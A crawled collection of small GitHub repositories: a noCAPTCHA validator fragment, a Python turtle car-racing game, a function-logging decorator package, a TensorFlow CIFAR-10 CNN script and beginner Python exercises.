rule for noCaptcha. Checks that the L{response}\n member is valid for the L{public_key} and L{private_key}\n constraints.\n \"\"\"\n for error in schema.Member._default_validation(self, context):\n yield error\n\n value = context.value\n if value:\n params = urllib.parse.urlencode({\n \"secret\" : get_setting(\"x_nocaptcha_private_key\"),\n \"response\" : value,\n \"remoteip\" : cherrypy.request.remote.ip\n }).encode(\"utf-8\")\n\n request = urllib.request.Request(\n url = self.VERIFY_SERVER,\n data = params,\n headers = {\n \"Content-type\" : \"application/x-www-form-urlencoded\",\n \"User-agent\" : \"Woost noCAPTCHA extension\"\n }\n )\n\n httpresp = urllib.request.urlopen(request)\n return_values = httpresp.read()\n httpresp.close()\n response_json = loads(return_values)\n\n if not response_json['success']:\n yield NoCaptchaValidationError(context)\n\n else:\n yield NoCaptchaValidationError(context)\n\n\nclass NoCaptchaValidationError(ValidationError):\n \"\"\"A validation error produced when the user fails a NoCaptcha\n validation.\n \"\"\"\n\n\ndefault_edit_control.set_member_type_display(\n NoCaptcha,\n \"woost.extensions.nocaptcha.NoCaptchaBox\"\n)\n\n" } ]
6
roshan1208/Car-Racing-Game-python-
https://github.com/roshan1208/Car-Racing-Game-python-
fe6d6e768f82a62d7120057ec839ad1f9597bd99
095b6f11cd6fe0e50d8b94b53dab024a93981095
650091969d78c7b60aa3a639e9ad5eafdf623e04
refs/heads/main
2023-03-11T07:58:22.877236
2021-02-19T07:53:11
2021-02-19T07:53:11
340,293,776
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4665161669254303, "alphanum_fraction": 0.5094055533409119, "avg_line_length": 24.918367385864258, "blob_id": "92c87e6e29dfef6e2bac555d7e45420bc70ab987", "content_id": "d73162f9685192ae3465ff5bac1bd44e6767a322", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1329, "license_type": "no_license", "max_line_length": 43, "num_lines": 49, "path": "/Car Racing Game/cars.py", "repo_name": "roshan1208/Car-Racing-Game-python-", "src_encoding": "UTF-8", "text": "import turtle as t\r\nfrom turtle import Turtle\r\nimport random\r\nt.colormode(255)\r\n\r\nclass Cars(Turtle):\r\n def __init__(self):\r\n super().__init__()\r\n self.car_speed = 10\r\n self.carcollection = []\r\n self.create_cars()\r\n\r\n def create_cars(self):\r\n tur = Turtle('square')\r\n tur.color('white')\r\n x_loc = -260\r\n # x_loc = random.randint(-280, 280)\r\n y_loc = random.randint(0, 9)\r\n tur.penup()\r\n tur.goto(x_loc, -225 + y_loc*50)\r\n self.carcollection.append(tur)\r\n # tur.forward(20)\r\n\r\n def move(self):\r\n for tur in self.carcollection:\r\n tur.forward(self.car_speed)\r\n\r\n def random_cars(self):\r\n tur = Turtle('square')\r\n r = random.randint(20,255)\r\n g = random.randint(20, 255)\r\n b = random.randint(20, 255)\r\n tur.color((r, g, b))\r\n x_loc = -310\r\n # x_loc = random.randint(-280, 280)\r\n y_loc = random.randint(0, 9)\r\n tur.penup()\r\n tur.goto(x_loc, -225 + y_loc*50)\r\n self.carcollection.append(tur)\r\n #tur.forward(20)\r\n\r\n def reset(self):\r\n for car in self.carcollection:\r\n car.reset()\r\n car.hideturtle()\r\n self.carcollection = []\r\n\r\n def level_up(self):\r\n self.car_speed += 2\r\n\r\n\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.45465537905693054, "alphanum_fraction": 0.4897218942642212, "avg_line_length": 28.55555534362793, "blob_id": "07095087bd0a8836821d54d1f52a0fa8b8f8a33c", "content_id": "82d915bd66f4df75ee1930d47191916fa1af13db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1654, "license_type": "no_license", "max_line_length": 64, "num_lines": 54, "path": "/Car Racing Game/mycar.py", "repo_name": "roshan1208/Car-Racing-Game-python-", "src_encoding": "UTF-8", "text": "from turtle import Turtle\r\n\r\n\r\nclass MyCar(Turtle):\r\n def __init__(self):\r\n super().__init__()\r\n self.my_turtle = 0\r\n self.score = 0\r\n self.create_mycar()\r\n\r\n def create_mycar(self):\r\n tur = Turtle('turtle')\r\n tur.shapesize()\r\n tur.color('red')\r\n tur.penup()\r\n tur.goto(0, -270)\r\n tur.setheading(90)\r\n self.my_turtle = tur\r\n\r\n def moveup(self):\r\n if self.my_turtle.ycor() > 0:\r\n if self.my_turtle.ycor() < 280:\r\n self.my_turtle.setheading(90)\r\n self.my_turtle.forward(20)\r\n else:\r\n self.my_turtle.goto(self.my_turtle.xcor(), 270)\r\n else:\r\n if self.my_turtle.ycor() > -280:\r\n self.my_turtle.setheading(90)\r\n self.my_turtle.forward(20)\r\n else:\r\n self.my_turtle.goto(self.my_turtle.xcor(), -270)\r\n\r\n def movedown(self):\r\n if self.my_turtle.ycor() > 0:\r\n if self.my_turtle.ycor() < 280:\r\n self.my_turtle.setheading(90)\r\n self.my_turtle.back(20)\r\n else:\r\n self.my_turtle.goto(self.my_turtle.xcor(), 270)\r\n else:\r\n if self.my_turtle.ycor() > -280:\r\n self.my_turtle.setheading(90)\r\n self.my_turtle.back(20)\r\n else:\r\n self.my_turtle.goto(self.my_turtle.xcor(), -270)\r\n\r\n def moveleft(self):\r\n self.my_turtle.setheading(180)\r\n self.my_turtle.forward(20)\r\n\r\n def moveright(self):\r\n self.my_turtle.setheading(0)\r\n self.my_turtle.forward(20)\r\n\r\n\r\n" }, { "alpha_fraction": 0.4104575216770172, "alphanum_fraction": 0.46078431606292725, "avg_line_length": 25.85454559326172, "blob_id": "898377b4eeb6f34e0e58ecc0e70b8c3d41efcf81", "content_id": "b0c602ac85da2ed9b22d93c705e6c932bba992ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1530, "license_type": "no_license", "max_line_length": 91, "num_lines": 55, "path": "/Car Racing Game/graphics.py", "repo_name": "roshan1208/Car-Racing-Game-python-", "src_encoding": "UTF-8", "text": "from turtle import Turtle\r\n\r\nROAD = 40\r\n\r\n\r\nclass Graphics(Turtle):\r\n def __init__(self):\r\n super().__init__()\r\n self.create_road()\r\n self.create_road_path()\r\n self.write()\r\n\r\n def create_road(self):\r\n for i in range(11):\r\n tur = Turtle('square')\r\n tur.color('blue')\r\n tur.pensize(4)\r\n tur.penup()\r\n tur.speed('fastest')\r\n tur.goto(-300, -(300-50*(i+1)))\r\n tur.pendown()\r\n tur.speed('fastest')\r\n tur.forward(600)\r\n tur.hideturtle()\r\n\r\n def create_road_path(self):\r\n tur2 = Turtle('square')\r\n tur2.color('white')\r\n tur2.pensize(2)\r\n tur2.penup()\r\n tur2.speed('fastest')\r\n for i in range(10):\r\n tur2.goto(-300, -(275-50*(i+1)))\r\n for j in range(15):\r\n tur2.pendown()\r\n tur2.speed(0)\r\n tur2.forward(20)\r\n tur2.penup()\r\n tur2.speed(0)\r\n tur2.forward(20)\r\n tur2.hideturtle()\r\n\r\n def write(self):\r\n tur3 = Turtle()\r\n tur3.penup()\r\n tur3.speed(10)\r\n tur3.goto(-10, -285)\r\n tur3.color('green')\r\n tur3.write(f'Starting Point', align='center', font=(\"Comic Sans MS\", 20, \"normal\"))\r\n\r\n tur3.penup()\r\n tur3.goto(-20, 260)\r\n tur3.color('red')\r\n tur3.write(f'End Point', align='center', font=(\"Comic Sans MS\", 20, \"normal\"))\r\n tur3.hideturtle()" }, { "alpha_fraction": 0.5918367505073547, "alphanum_fraction": 0.6161695718765259, "avg_line_length": 21.629629135131836, "blob_id": "f2fbcd66f3855775a22f5980f834aa36ce000f23", "content_id": "a6f86f533322da79e2fa6fbeb8ab0e4fe242b0f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1274, "license_type": "no_license", "max_line_length": 67, "num_lines": 54, "path": "/Car Racing Game/main.py", "repo_name": "roshan1208/Car-Racing-Game-python-", "src_encoding": "UTF-8", "text": "from turtle import Turtle, Screen\r\nfrom graphics import Graphics\r\nfrom cars import Cars\r\nfrom mycar import MyCar\r\nfrom score import Score\r\nimport time\r\n\r\n\r\nscreen = Screen()\r\nscreen.setup(width=600, height=600)\r\nscreen.title('Car Race Game')\r\nscreen.bgcolor('black')\r\nscreen.tracer(0)\r\n\r\ncars = Cars()\r\ngraphics = Graphics()\r\nmycar = MyCar()\r\nscore = Score()\r\n\r\nscreen.listen()\r\nscreen.onkeypress(key='Up', fun=mycar.moveup)\r\nscreen.onkeypress(key='Down', fun=mycar.movedown)\r\nscreen.onkeypress(key='Left', fun=mycar.moveleft)\r\nscreen.onkeypress(key='Right', fun=mycar.moveright)\r\n\r\nis_true = True\r\ni = 1\r\nwhile is_true:\r\n screen.update()\r\n time.sleep(0.03)\r\n if i%3 == 0:\r\n cars.random_cars()\r\n\r\n for car in cars.carcollection:\r\n if car.distance(mycar.my_turtle) <= 20:\r\n mycar.my_turtle.forward(20)\r\n is_true = False\r\n score.game_over()\r\n\r\n cars.move()\r\n i += 1\r\n if mycar.my_turtle.distance(mycar.my_turtle.xcor(), 280) <= 10:\r\n mycar.my_turtle.forward(20)\r\n i = 1\r\n score.level_up()\r\n time.sleep(2)\r\n score.score_turtle.clear()\r\n mycar.my_turtle.goto(0, -280)\r\n cars.reset()\r\n cars.level_up()\r\n score.scoreboard()\r\n\r\n\r\nscreen.exitonclick()" }, { "alpha_fraction": 0.49504950642585754, "alphanum_fraction": 0.5115511417388916, "avg_line_length": 26.40625, "blob_id": "c7d0d954bc08779fe3b8f6f361026f1d3cf93fe9", "content_id": "516d9823b32ab4ba59620607ad90638c4763a947", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 909, "license_type": "no_license", "max_line_length": 95, "num_lines": 32, "path": "/Car Racing Game/score.py", "repo_name": "roshan1208/Car-Racing-Game-python-", "src_encoding": "UTF-8", "text": "from turtle import Turtle\r\n\r\nclass Score(Turtle):\r\n def __init__(self):\r\n super().__init__()\r\n self.temp = 0\r\n self.score_turtle = 0\r\n\r\n\r\n def level_up(self):\r\n self.temp += 1\r\n tur = Turtle()\r\n tur.color('yellow')\r\n tur.hideturtle()\r\n tur.penup()\r\n tur.write(f'Level {self.temp} ', align='center', font=(\"Comic Sans MS\", 30, \"normal\"))\r\n self.score_turtle = tur\r\n\r\n def game_over(self):\r\n tur = Turtle()\r\n tur.color('red')\r\n tur.hideturtle()\r\n tur.penup()\r\n tur.write(f'Game Over ', align='center', font=(\"Comic Sans MS\", 40, \"normal\"))\r\n\r\n def scoreboard(self):\r\n self.clear()\r\n self.color('white')\r\n self.hideturtle()\r\n self.penup()\r\n self.goto(-200, 260)\r\n self.write(f'Score {self.temp} ', align='center', font=(\"Comic Sans MS\", 20, \"normal\"))\r\n" }, { "alpha_fraction": 0.7593085169792175, "alphanum_fraction": 0.7646276354789734, "avg_line_length": 38.578948974609375, "blob_id": "ef9877fd1e6aee7058e379313caf6f760a197f58", "content_id": "86a2a0e8f08211cce359b5998c3896cc04b57052", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 752, "license_type": "no_license", "max_line_length": 115, "num_lines": 19, "path": "/README.md", "repo_name": "roshan1208/Car-Racing-Game-python-", "src_encoding": "UTF-8", "text": "# Car-Racing-Game-python-\n#FunProject\n#ChildhoodGame\n#CodeInPython\n\nIn this project i have create 2-D Car Racing Game which personally i used to play in my childhood days\nidea is simple a Turtle want to cross the multi lan Road and now its your responsibility to help turtle by pressing\nUp, Down, Left, Right arrow key to cross the road....(From Starting point to End point)\nevery time Turtle reach the end point... Game will level up and car speed will increase ...\n..\n\nstep to follow:\n1.> Open \"Car Racing Game\" Folder to pycharm, vscode or spyder IDE (i personally use Pycharm)\n2.First verify in your interpreter \"turtle library\" is install or not? (If not then install turtle library)\n3.> Run main.py file \n\nEnjoy\nFor any query contact me:\[email protected]\n" } ]
6
hatefap/cnn
https://github.com/hatefap/cnn
ebc0a61b4a75ecabdf5f3b66cac2f1e4f5893efd
1dc3a952aa183a28a034d0056f229871934579fb
dfdb64ee4a2a5d453b09a00a0827568d9c2bfac5
refs/heads/master
2020-06-18T20:10:38.759516
2019-07-13T11:07:30
2019-07-13T11:07:30
196,431,577
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6230273246765137, "alphanum_fraction": 0.6592562198638916, "avg_line_length": 28.60569190979004, "blob_id": "e99cdb451323d190f14df8322584c86da4c85d2f", "content_id": "19c5b931e3e1a31c31807bd52e39c6fb9182bba1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7287, "license_type": "no_license", "max_line_length": 132, "num_lines": 246, "path": "/cnn.py", "repo_name": "hatefap/cnn", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n\n\nimport tensorflow as tf\n\n\n\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\nimport math\n\n\n\n\nimport glob\n\n\n\n\n#directory location of cifar-10 binary files\nCIFAR_LOCATTION = '/home/hatef/cifar-10/cifar-10-batches-bin/'\nBATCH_SIZE = 32\nLEARNING_RATE = 0.001\nEPOCH = 50\n\n\n\n\n# produce images for training from data_batch_i where 0 < i < 6\ndef image_training_generator():\n # if you look at cifar-10 extracted zip file, you see following pattern among training files \n common_name = 'data_batch_?.bin'\n bin_files = []\n for file in glob.glob(CIFAR_LOCATTION + common_name):\n bin_files.append(file)\n \n while(len(bin_files) > 0):\n file_path = bin_files.pop()\n with open(file_path, 'rb') as handle:\n while True:\n label = handle.read(1) # first byte is label of image, label is between 0-9\n image = handle.read(3072) # next 3072 bytes are image itself\n # if we reach eof file\n if len(label) < 1 or len(image) < 3072: \n break\n label = int.from_bytes(label, byteorder=sys.byteorder)\n one_hot_encoded_label = np.zeros(shape=(10,))\n one_hot_encoded_label[label] = 1\n \n image = np.array([b for b in image])\n R = image[0:1024].reshape(32,32)\n G = image[1024:2048].reshape(32,32)\n B = image[2048:].reshape(32,32)\n yield np.dstack((R, G, B)) / 255, one_hot_encoded_label\n \n\n\n\n\n# you can use similar approach to generate test data, but here we want to use another common approach\ntest_pickle_python = '/home/hatef/cifar-10/python/cifar-10-batches-py/test_batch'\ndef unpickle(file_location):\n import _pickle as cPickle\n with open(file_location, 'rb') as fo:\n dict = cPickle.load(fo, encoding='latin1')\n return dict\n\ntest_data = unpickle(test_pickle_python)\n\n\n\n\nx_test = test_data['data']\ny_test = test_data['labels']\n\nx_test = x_test.reshape(10000, 3, 32, 32).transpose(0,2,3,1).astype(\"uint8\")\nx_test = x_test / 255\n\nn_classes = 10\ny_test = np.array(y_test).reshape(-1)\ny_test = np.eye(n_classes)[y_test]\n\n\n\n\n# if you have variance problem use this class to increase your training data\nclass ImageTransformation:\n @staticmethod\n def flip_image_horizental(images):\n # images --> [batch, height, width, channels]\n return tf.image.flip_left_right(images)\n \n @staticmethod\n def flip_image_vertical(images):\n # images --> [batch, height, width, channels]\n return tf.image.flip_up_down(images)\n \n @staticmethod\n def rotate_image(images, degree):\n return tf.contrib.image.rotate(images, math.radians(degree))\n \n @staticmethod\n def transform_image(images, transform_vector):\n return tf.contrib.image.transform(images, transform_vector)\n\n\n\n# we use 2 convolutional layers, and use max pool in each convolutional layer, our classification layer \n# is 2 dense layers \ndef do_conv(input_tensor, W):\n # input_tensor --> [batch, height of image, width of image, number of channels]\n # W --> W is our kernel, [filter height, filter width, input channel, output channel].\n \n # padding SAME retain size of image during convolution operation by adding zero padding to image\n return tf.nn.conv2d(input_tensor, filter=W, padding='SAME', strides=[1,1,1,1])\n\n\ndef do_max_pool(input_tensor, window=2):\n # we do subsampling with this method i.e. if window=2 then tensor [10, 32, 32, 64] becomes [10, 16, 16, 64] after this operation\n return tf.nn.max_pool(input_tensor, ksize=(1, window, window, 1), strides=(1, window, window, 1), padding='VALID')\n\ndef dense_layer(input_tensor, neurons=128):\n # input_tensor --> [N(batch), M]\n dense_layer_weight = tf.Variable(tf.truncated_normal(shape=[int(input_tensor.get_shape()[1]), neurons], mean=0.0, stddev=0.2))\n dense_layer_bias = tf.Variable(tf.truncated_normal(shape=[neurons], mean=0.0, stddev=0.2))\n \n return tf.add(tf.matmul(input_tensor, dense_layer_weight), dense_layer_bias)\n \n\n\n\n\nX = tf.placeholder(dtype=tf.float32, shape=(None, 32,32,3), name='input_images')\n\n# none is batch size and 10 is the number of classes in encoded form\ny_true = tf.placeholder(dtype=tf.float32, shape=(None, 10), name='label_of_input_images')\n\n\n\n\n# we can use at most one -1 in shape argument. because the number of batch is unknown until run time. we use -1 \n# and tensor flow sets appropriate number in run time\nnet_in = tf.reshape(X, shape=[-1, 32,32,3])\n\n# our first convolution layer\n\nfilter_1 = tf.Variable(tf.truncated_normal(shape=[2, 2, 3, 32], stddev=0.5))\nbias_filter_1 = tf.Variable(tf.truncated_normal([int(filter_1.get_shape()[3])]))\nconv_1 = tf.nn.bias_add(do_conv(net_in, filter_1), bias_filter_1)\n\n\n# pass through elu activation function\nresult_conv_1 = tf.nn.elu(conv_1)\n\n# first subsample\nconv_1_subsample = do_max_pool(result_conv_1)\n\n# our second convolution layer\nfilter_2 = tf.Variable(tf.truncated_normal(shape=[2, 2, 32, 32], stddev=0.5))\nbias_filter_2 = tf.Variable(tf.truncated_normal([int(filter_1.get_shape()[3])]))\nconv_2 = tf.nn.bias_add(do_conv(conv_1_subsample, filter_2), bias_filter_2)\n\nresult_conv_2 = tf.nn.elu(conv_2)\n\nconv_2_subsample = do_max_pool(result_conv_2)\n# after two subsample our images size is 8 * 8\nflat_conv_2_subsample = tf.reshape(conv_2_subsample, shape=[-1, 8*8*32])\ndense_layer_1 = tf.nn.elu(dense_layer(flat_conv_2_subsample, neurons=32))\ndropped_1 = tf.nn.dropout(dense_layer_1,keep_prob=0.8)\ndense_layer_2 = tf.nn.elu(dense_layer(dense_layer_1, neurons=16))\ndropped_2 = tf.nn.dropout(dense_layer_2,keep_prob=0.8)\n\nclassification_layer = dense_layer(dropped_2, neurons=10)\n\n\n\n\nclassification_layer.get_shape()\n\n\n\n\ntrain_dataset = tf.data.Dataset.from_generator(image_training_generator, output_types=(tf.float32, tf.int32))\n\n\n\n\n# using batch(BATCH_SIZE) not works!, why?\ntrain_dataset = train_dataset.apply(tf.contrib.data.sliding_window_batch(window_size=BATCH_SIZE, window_shift=BATCH_SIZE))\ntrain_dataset = train_dataset.repeat(EPOCH)\n\n\n\n\niterator = train_dataset.make_one_shot_iterator()\nelements = iterator.get_next()\n\n\n\n\n\nloss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_true, logits=classification_layer))\noptimzer = tf.train.AdamOptimizer(learning_rate=LEARNING_RATE)\ntrain = optimzer.minimize(loss)\n\n\n\n\nvars_init = tf.global_variables_initializer()\n\n\n\n\nwith tf.Session() as sess:\n sess.run(vars_init)\n step = 0\n counter = 0\n while True:\n try:\n images,labels = sess.run(elements)\n sess.run(train, feed_dict={net_in:images, y_true:labels})\n step += 1\n if step%100 == 0:\n counter += 1\n preds = tf.equal(tf.argmax(classification_layer, 1), tf.argmax(y_true, 1))\n acc = tf.reduce_mean(tf.cast(preds, tf.float32))\n res = sess.run(acc, feed_dict={net_in:x_test, y_true:y_test})\n print(f'accuracy after {counter*step} updates in weights: {res}')\n step = 0\n except tf.errors.OutOfRangeError: \n break\n\n\n\n# accuracy after 31200 updates in weights: 0.6800000254260437\n\n\n\n\n\n\n\n# In[ ]:\n\n\n\n\n" } ]
1
SergK9/turtle_exemple
https://github.com/SergK9/turtle_exemple
604567d6f792ba30bc4893fff5769cc27f3d8128
c0f48ea7ffff4fc4ad3fb4e74a3b06989b86f823
9aba3e13fb90675a572a673d65a816ee539c6ca2
refs/heads/main
2023-05-07T03:54:44.839623
2021-05-27T17:40:05
2021-05-27T17:40:05
371,447,440
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6703296899795532, "alphanum_fraction": 0.7362637519836426, "avg_line_length": 13.076923370361328, "blob_id": "bf75f6c2d258b092251a0a4782faa1af3340e9ca", "content_id": "ac99e7ea13b91a7afbcdcec3cf118a00953412c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 182, "license_type": "no_license", "max_line_length": 24, "num_lines": 13, "path": "/main1.py", "repo_name": "SergK9/turtle_exemple", "src_encoding": "UTF-8", "text": "import turtle\n\nplayer = turtle.Turtle()\nplayer.shape(\"turtle\")\nplayer.forward(100)\nplayer.left(90)\nplayer.fd(100)\nplayer.lt(90)\nplayer.up()\nplayer.down()\nplayer.rt(90)\n\nturtle.done()" }, { "alpha_fraction": 0.5782312750816345, "alphanum_fraction": 0.7195767164230347, "avg_line_length": 12.926316261291504, "blob_id": "e36a4f34e71bd7b48033ad5e13b9d84ab15daedf", "content_id": "1ada0ecf64872c3de6a0d119bb82c2ce0244985f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1334, "license_type": "no_license", "max_line_length": 24, "num_lines": 95, "path": "/home1.py", "repo_name": "SergK9/turtle_exemple", "src_encoding": "UTF-8", "text": "import turtle\n\nartist = turtle.Turtle()\n#Рисуем крышу\nartist.lt(180)\nartist.fd(20)\nartist.fd(2)\nartist.lt(270)\nartist.fd(10)\nartist.rt(90)\nartist.fd(10)\nartist.rt(270)\nartist.fd(10)\nartist.lt(270)\nartist.fd(10)\nartist.lt(90)\nartist.fd(10)\nartist.rt(90)\nartist.fd(10)\nartist.lt(90)\nartist.fd(40)\nartist.rt(90)\nartist.fd(10)\nartist.rt(90)\nartist.fd(30)\nartist.lt(90)\nartist.fd(10)\nartist.rt(270)\nartist.fd(10)\nartist.rt(90)\nartist.fd(10)\nartist.rt(270)\nartist.fd(10)\nartist.rt(90)\nartist.fd(10)\nartist.rt(90)\nartist.fd(10)\nartist.lt(90)\nartist.fd(10)\nartist.lt(270)\nartist.fd(10)\nartist.rt(270)\nartist.fd(10)\nartist.lt(270)\nartist.fd(10)\nartist.rt(270)\nartist.fd(20)\n\nartist.rt(90)\nartist.fd(10)\nartist.rt(270)\nartist.fd(10)\nartist.lt(270)\nartist.fd(10)\nartist.lt(90)\nartist.fd(10)\nartist.lt(270)\nartist.fd(10)\nartist.lt(270)\nartist.fd(110)\n\nartist.lt(90)\nartist.fd(70)\nartist.lt(90)\nartist.fd(90)\nartist.lt(90)\nartist.fd(70)\nartist.lt(180)\nartist.fd(70)\nartist.lt(270)\nartist.fd(20)\nartist.rt(90)\nartist.fd(40)\nartist.lt(90)\nartist.fd(20)\nartist.lt(90)\nartist.fd(40)\nartist.up()\nartist.lt(180)\nartist.fd(30)\nartist.lt(90)\nartist.fd(20)\nartist.down()\nartist.rt(90)\nartist.fd(20)\nartist.lt(90)\nartist.fd(20)\nartist.lt(90)\nartist.fd(20)\nartist.lt(90)\nartist.fd(20)\nartist.up()\nartist.fd(1000)\nturtle.done()\nartist.hideturtle()\n" } ]
2
mehta-smit/function_logger
https://github.com/mehta-smit/function_logger
30a30089b5d5fdaf7a5cb7893563cac10fe22c5c
ca2d39fe6446c5d06b3c5a7e82260f8177039aed
752c1e0133a17c1ed4cb5e5b5aadfc34419cdbeb
refs/heads/master
2021-09-08T06:23:43.695896
2018-03-07T20:44:27
2018-03-07T20:44:27
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7389705777168274, "alphanum_fraction": 0.7444853186607361, "avg_line_length": 25.536584854125977, "blob_id": "917110fd2721a357fa230660c73cd1a4eb79f90b", "content_id": "e153014cde6b32f4128b03f216f0abc882fa68e9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1088, "license_type": "permissive", "max_line_length": 237, "num_lines": 41, "path": "/README.md", "repo_name": "mehta-smit/function_logger", "src_encoding": "UTF-8", "text": "# function_logger\nPip install-able library that logs the function functionality in log file. Function logger is a decorator that logs the function name and function argument when function is called and return parameters of functions when function is ended\n\n\n\nInstallation Instruction!\n===================\n\n>- Activate your Virtual Environment.\n>- pip install function-logger\n\n----------\n\n**function-logger** is library having function logger that logs the function parameters.\n\n# Features\n\n 1. Function logger library comes with a function_logger decorator that takes a logger and logs the request paramters with function name and logs the return of function.\n\n# Usage\n\n 1. Import function logger library\n\t - `from function_logger import function_logger`\n\n# Example\n\n```python\nfrom function_logger import function_logger\nfrom logger import logger\n# logger of your project\n\n@function_logger(logger)\ndef log_function(name=None, age=None):\n logger.debug(\"Inside log function\")\n return dict(bmi=19)\n\n\nif __name__ == \"__main__\":\n\tbmi = log_function(name=\"hello\", age=13)\n\tprint bmi\n```\n" }, { "alpha_fraction": 0.41654136776924133, "alphanum_fraction": 0.41654136776924133, "avg_line_length": 26.70833396911621, "blob_id": "3feb2e97add1871ca97be7a7a8c3906ef0a655d2", "content_id": "cf840fbf68f18ac0aee2eba40bd06b9525b2ad49", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 665, "license_type": "permissive", "max_line_length": 67, "num_lines": 24, "path": "/function_logger/__init__.py", "repo_name": "mehta-smit/function_logger", "src_encoding": "UTF-8", "text": "from functools import wraps\n\n\ndef function_logger(logging):\n def wrap(func):\n @wraps(func)\n def function_log(*args, **kwargs):\n logging.debug(\n \"Inside Function {} with parameters: {},{}\".format(\n func.__name__,\n args,\n kwargs\n )\n )\n return_param = func(*args, **kwargs)\n logging.debug(\n \"Function: {} returns {}\".format(\n func.__name__,\n return_param\n )\n )\n return return_param\n return function_log\n return wrap\n" } ]
2
thaparudita/Python_Basics
https://github.com/thaparudita/Python_Basics
27130a2ff85bfcb45f79170c0223aa117d193968
dfc01aa5757f5dd94f710c4e9a6006ff64ffa20e
2d5b87c237f68468c572bc5abcba849458034616
refs/heads/master
2020-12-15T16:34:42.568331
2020-01-22T07:23:20
2020-01-22T07:23:20
235,180,122
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5407407283782959, "alphanum_fraction": 0.5814814567565918, "avg_line_length": 22.545454025268555, "blob_id": "cbf416015969c94e3f097f7a9437a0bc83aebd6b", "content_id": "7e59a34f90a81989437dc652fe65a858fab44f38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 270, "license_type": "no_license", "max_line_length": 57, "num_lines": 11, "path": "/session6D.py", "repo_name": "thaparudita/Python_Basics", "src_encoding": "UTF-8", "text": "def square(numbers):\r\n print(\">> [square] numbers is:\",numbers, id(numbers))\r\n\r\n for i in range(0, len(numbers)):\r\n numbers[i] = numbers[i] * numbers[i]\r\n\r\n\r\n#list in python\r\nnumbers = [10, 20, 30, 40, 50]\r\n\r\nprint(\">> numbers is :\", numbers, id(numbers))\r\n" }, { "alpha_fraction": 0.5488371849060059, "alphanum_fraction": 0.5627906918525696, "avg_line_length": 14.692307472229004, "blob_id": "0d2567e7b5cf23c228b412f8faf7a1ad5964fe48", "content_id": "6cc9e92bd96e128e2a458f2b217f7960c0be1e39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 215, "license_type": "no_license", "max_line_length": 48, "num_lines": 13, "path": "/session7C.py", "repo_name": "thaparudita/Python_Basics", "src_encoding": "UTF-8", "text": "\"\"\"\r\nIn dictionary we have indexes replaced with keys\r\nkeys can be of our choice\r\nand they must be always string\r\n\r\n\"\"\"\r\n\r\nstudent = {\r\n \"rollnum\" : 101,\r\n \"name\": \"John\",\r\n \"email\": \"[email protected]\",\r\n\r\n}" }, { "alpha_fraction": 0.4545454680919647, "alphanum_fraction": 0.4545454680919647, "avg_line_length": 15.600000381469727, "blob_id": "667f6da30179e378975706835fc99a47b623b397", "content_id": "4ba34faf1c0199c1e16aa899ba23b3ac49108435", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 88, "license_type": "no_license", "max_line_length": 29, "num_lines": 5, "path": "/session6B.py", "repo_name": "thaparudita/Python_Basics", "src_encoding": "UTF-8", "text": "def basic():\r\n print(\">> main function\")\r\n\r\nif __name__ == \"__main__\":\r\n basic()\r\n" }, { "alpha_fraction": 0.49013158679008484, "alphanum_fraction": 0.5032894611358643, "avg_line_length": 19.85714340209961, "blob_id": "4e94bb5748fdcf591670886a1aaf341b0a9bad8a", "content_id": "e7a46a91ab078cca3787a0503cc273687b82b03d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 304, "license_type": "no_license", "max_line_length": 40, "num_lines": 14, "path": "/session6A.py", "repo_name": "thaparudita/Python_Basics", "src_encoding": "UTF-8", "text": "print(\">>welcome to python app\")\r\n\r\nnum = int(input(\"enter a number : \"))\r\nprint(\">> 1. num is:\", num, id(num))\r\n\r\ndef square(n):\r\n global num\r\n n = n*n\r\n num = n\r\n print(\">> 2. num is:\", n, id(n))\r\n print(\">> 3. num is:\", num, id(num))\r\n\r\nsquare(num)\r\nprint(\">> 4. num is:\", num, id(num))" }, { "alpha_fraction": 0.38738739490509033, "alphanum_fraction": 0.4234234094619751, "avg_line_length": 10.55555534362793, "blob_id": "4bbf0810c19c9d2247b5b511c9863175679420e1", "content_id": "0cfa03c5bab581edf855d681f006354d5a1d61c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 111, "license_type": "no_license", "max_line_length": 17, "num_lines": 9, "path": "/session6.py", "repo_name": "thaparudita/Python_Basics", "src_encoding": "UTF-8", "text": "def show(num):\r\n print(num)\r\n num -= 1\r\n if num == 0:\r\n show(num)\r\n return\r\n\r\n\r\nshow(10)" }, { "alpha_fraction": 0.5448179244995117, "alphanum_fraction": 0.6120448112487793, "avg_line_length": 15.800000190734863, "blob_id": "c0b4558aa7a489e5103ce5956b11a75d4ccbe738", "content_id": "cd0698a294d63585dfc269b12e6645b2344d78ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 714, "license_type": "no_license", "max_line_length": 50, "num_lines": 40, "path": "/session7D.py", 